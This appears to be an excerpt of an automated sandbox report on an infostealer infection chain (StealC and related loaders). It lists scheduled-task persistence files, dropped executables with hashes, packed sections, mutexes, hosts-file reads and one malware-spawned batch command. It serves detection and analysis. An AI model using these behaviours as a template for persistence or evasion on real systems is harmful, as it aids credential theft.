Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	7_2_6C0CF280

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Windows\Tasks\Gxtuum.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\LuggageRepresentations
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\AdditionsSalvation
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\SixCream
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\HomelessLaser
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\ActuallyFtp
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\EauOfficial
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_009DE440	6_2_009DE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_009D4CF0	6_2_009D4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A13068	6_2_00A13068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A07D83	6_2_00A07D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_009D4AF0	6_2_009D4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A1765B	6_2_00A1765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A12BD0	6_2_00A12BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A18720	6_2_00A18720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A16F09	6_2_00A16F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A1777B	6_2_00A1777B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0C35A0	7_2_6C0C35A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C105C10	7_2_6C105C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C112C10	7_2_6C112C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C13AC00	7_2_6C13AC00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C13542B	7_2_6C13542B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D5440	7_2_6C0D5440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C13545C	7_2_6C13545C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D6C80	7_2_6C0D6C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1234A0	7_2_6C1234A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C12C4A0	7_2_6C12C4A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D64C0	7_2_6C0D64C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0ED4D0	7_2_6C0ED4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C106CF0	7_2_6C106CF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CD4E0	7_2_6C0CD4E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0DFD00	7_2_6C0DFD00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0F0512	7_2_6C0F0512
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0EED10	7_2_6C0EED10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C100DD0	7_2_6C100DD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1285F0	7_2_6C1285F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C107E10	7_2_6C107E10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C115600	7_2_6C115600
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C129E30	7_2_6C129E30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C103E50	7_2_6C103E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0E4640	7_2_6C0E4640
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0E9E50	7_2_6C0E9E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C112E4E	7_2_6C112E4E
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C136E63	7_2_6C136E63
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CC670	7_2_6C0CC670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C12E680	7_2_6C12E680
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0E5E90	7_2_6C0E5E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C124EA0	7_2_6C124EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1376E3	7_2_6C1376E3
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CBEF0	7_2_6C0CBEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0DFEF0	7_2_6C0DFEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C107710	7_2_6C107710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D9F00	7_2_6C0D9F00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1177A0	7_2_6C1177A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CDFE0	7_2_6C0CDFE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0F6FF0	7_2_6C0F6FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0D7810	7_2_6C0D7810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C10B820	7_2_6C10B820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C114820	7_2_6C114820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0E8850	7_2_6C0E8850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0ED850	7_2_6C0ED850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C10F070	7_2_6C10F070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0F60A0	7_2_6C0F60A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1350C7	7_2_6C1350C7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0EC0E0	7_2_6C0EC0E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1058E0	7_2_6C1058E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0EA940	7_2_6C0EA940
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C11B970	7_2_6C11B970
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C13B170	7_2_6C13B170
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0DD960	7_2_6C0DD960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C105190	7_2_6C105190
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C122990	7_2_6C122990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CC9A0	7_2_6C0CC9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0FD9B0	7_2_6C0FD9B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C109A60	7_2_6C109A60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C13BA90	7_2_6C13BA90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C132AB0	7_2_6C132AB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0C22A0	7_2_6C0C22A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0F4AA0	7_2_6C0F4AA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0DCAB0	7_2_6C0DCAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C108AC0	7_2_6C108AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C10E2F0	7_2_6C10E2F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0E1AF0	7_2_6C0E1AF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C10D320	7_2_6C10D320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0C5340	7_2_6C0C5340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0DC370	7_2_6C0DC370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0CF380	7_2_6C0CF380
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1353C8	7_2_6C1353C8
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C24AC30	7_2_6C24AC30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C236C00	7_2_6C236C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C17AC60	7_2_6C17AC60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1CECD0	7_2_6C1CECD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C16ECC0	7_2_6C16ECC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2F8D20	7_2_6C2F8D20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C23ED70	7_2_6C23ED70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C29AD50	7_2_6C29AD50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C174DB0	7_2_6C174DB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C206D90	7_2_6C206D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2FCDC0	7_2_6C2FCDC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C250E20	7_2_6C250E20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C20EE70	7_2_6C20EE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1F6E90	7_2_6C1F6E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C17AEC0	7_2_6C17AEC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C210EC0	7_2_6C210EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C176F10	7_2_6C176F10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B0F20	7_2_6C2B0F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C232F70	7_2_6C232F70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1DEF40	7_2_6C1DEF40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B8FB0	7_2_6C2B8FB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C17EFB0	7_2_6C17EFB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C24EFF0	7_2_6C24EFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C170FE0	7_2_6C170FE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1C0820	7_2_6C1C0820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1FA820	7_2_6C1FA820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C244840	7_2_6C244840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2768E0	7_2_6C2768E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1C6900	7_2_6C1C6900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1A8960	7_2_6C1A8960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2009A0	7_2_6C2009A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C22A9A0	7_2_6C22A9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2309B0	7_2_6C2309B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C28C9E0	7_2_6C28C9E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1A49F0	7_2_6C1A49F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C228A30	7_2_6C228A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C21EA00	7_2_6C21EA00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1ECA70	7_2_6C1ECA70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C210BA0	7_2_6C210BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C276BE0	7_2_6C276BE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1FA430	7_2_6C1FA430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1D4420	7_2_6C1D4420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C188460	7_2_6C188460
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C29A480	7_2_6C29A480
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1B64D0	7_2_6C1B64D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C20A4D0	7_2_6C20A4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C210570	7_2_6C210570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1C8540	7_2_6C1C8540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C274540	7_2_6C274540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2B8550	7_2_6C2B8550
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1D2560	7_2_6C1D2560
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1645B0	7_2_6C1645B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C23A5E0	7_2_6C23A5E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1FE5F0	7_2_6C1FE5F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C1CC650	7_2_6C1CC650

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe C1E5AA5CE3B549CFC00285B701F0C074DC66A6087C6ED7F275619C30E7067A70
Source: Joe Sandbox View	Dropped File: C:\ProgramData\LgAmARwZ\Application.exe 8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 006945C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C1094D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C193620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C199B10 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C0FCBE8 appears 134 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe1.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dc753b12e1.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: univ[1].exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Application.exe.32.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973177792915532
Source: file.exe	Static PE information: Section: qmypprrr ZLIB complexity 0.9942371197392498
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973177792915532
Source: axplong.exe.0.dr	Static PE information: Section: qmypprrr ZLIB complexity 0.9942371197392498
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.998150960031348
Source: 3288f0a855.exe.6.dr	Static PE information: Section: ZLIB complexity 0.998150960031348
Source: GOLD1234[1].exe.6.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: GOLD1234.exe.6.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: yxrd0ob7[1].exe.6.dr	Static PE information: Section: .back ZLIB complexity 1.0003314936926606
Source: yxrd0ob7.exe.6.dr	Static PE information: Section: .back ZLIB complexity 1.0003314936926606
Source: hhnjqu9y[1].exe.6.dr	Static PE information: Section: ZLIB complexity 1.0000548585295332
Source: hhnjqu9y[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.99914162022293
Source: hhnjqu9y.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0000548585295332
Source: hhnjqu9y.exe.6.dr	Static PE information: Section: ZLIB complexity 0.99914162022293
Source: random[2].exe.6.dr	Static PE information: Section: mmyokrrt ZLIB complexity 0.9948476997442071
Source: efbc18aa93.exe.6.dr	Static PE information: Section: mmyokrrt ZLIB complexity 0.9948476997442071
Source: random[1].exe0.6.dr	Static PE information: Section: ZLIB complexity 0.9980101391065831
Source: 109418c5c3.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9980101391065831
Source: 51a08c3032.exe.6.dr	Static PE information: Section: mmyokrrt ZLIB complexity 0.9948476997442071
Source: 2bbdb01603.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9980101391065831

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@90/164@0/17

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_6C127030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

7_2_6C127030

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

7_2_006A9600

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

7_2_006A3720

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stealc_default2[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3280
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:1496:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp, stealc_default2.exe, 00000007.00000002.3147901180.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3129729389.000000001AFD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
